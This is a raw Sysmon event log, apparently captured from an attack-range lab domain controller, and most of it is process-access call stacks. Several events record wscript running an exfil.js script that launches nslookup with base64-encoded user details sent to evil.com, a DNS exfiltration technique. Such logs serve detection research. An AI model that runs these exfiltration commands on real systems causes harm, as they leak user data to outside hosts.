14:16:45.794{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204354Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.794{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204353Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.794{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204352Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.794{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204351Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.794{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CD-629A-0542-000000005F02}2672C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204350Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.794{2E1864BB-17CD-629A-0342-000000005F02}16925156C:\Windows\system32\cmd.exe{2E1864BB-17CD-629A-0542-000000005F02}2672C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204349Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.797{2E1864BB-17CD-629A-0542-000000005F02}2672C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CD-629A-0342-000000005F02}1692C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfjcxa.tmp 2>&1 10341000x8000000000000000204348Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.763{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CD-629A-0442-000000005F02}5060C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204347Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.763{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CD-629A-0442-000000005F02}5060C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204346Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.763{2E1864BB-17CD-629A-0442-000000005F02}50607436C:\Windows\system32\conhost.exe{2E1864BB-17CD-629A-0342-000000005F02}1692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204345Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.741{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CD-629A-0442-000000005F02}5060C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204344Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.741{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204343Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.741{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204342Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.741{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204341Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.741{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204340Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.741{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CD-629A-0342-000000005F02}1692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204339Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.741{2E1864BB-17A1-629A-783D-000000005F02}55528C:\Windows\System32\WScript.exe{2E1864BB-17CD-629A-0342-000000005F02}1692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204338Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.742{2E1864BB-17CD-629A-0342-000000005F02}1692C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfjcxa.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000204337Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.725{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhgy.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000204336Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.710{2E1864BB-17CD-629A-0142-000000005F02}65205696C:\Windows\system32\conhost.exe{2E1864BB-17CD-629A-0242-000000005F02}7736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204335Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.710{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204334Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.694{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204333Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.694{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204332Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.694{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204331Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.694{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CD-629A-0242-000000005F02}7736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204330Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.694{2E1864BB-17CD-629A-0042-000000005F02}25687644C:\Windows\system32\cmd.exe{2E1864BB-17CD-629A-0242-000000005F02}7736C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000204329Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.708{2E1864BB-17CD-629A-0242-000000005F02}7736C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CD-629A-0042-000000005F02}2568C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhgy.tmp 2>&1 10341000x8000000000000000204328Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.678{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17CD-629A-0142-000000005F02}6520C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204327Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.678{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CD-629A-0142-000000005F02}6520C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204326Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.678{2E1864BB-17CD-629A-0142-000000005F02}65205696C:\Windows\system32\conhost.exe{2E1864BB-17CD-629A-0042-000000005F02}2568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204325Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.663{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CD-629A-0142-000000005F02}6520C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204324Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:45.641{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17CD-629A-0042-000000005F02}2568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000204323Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 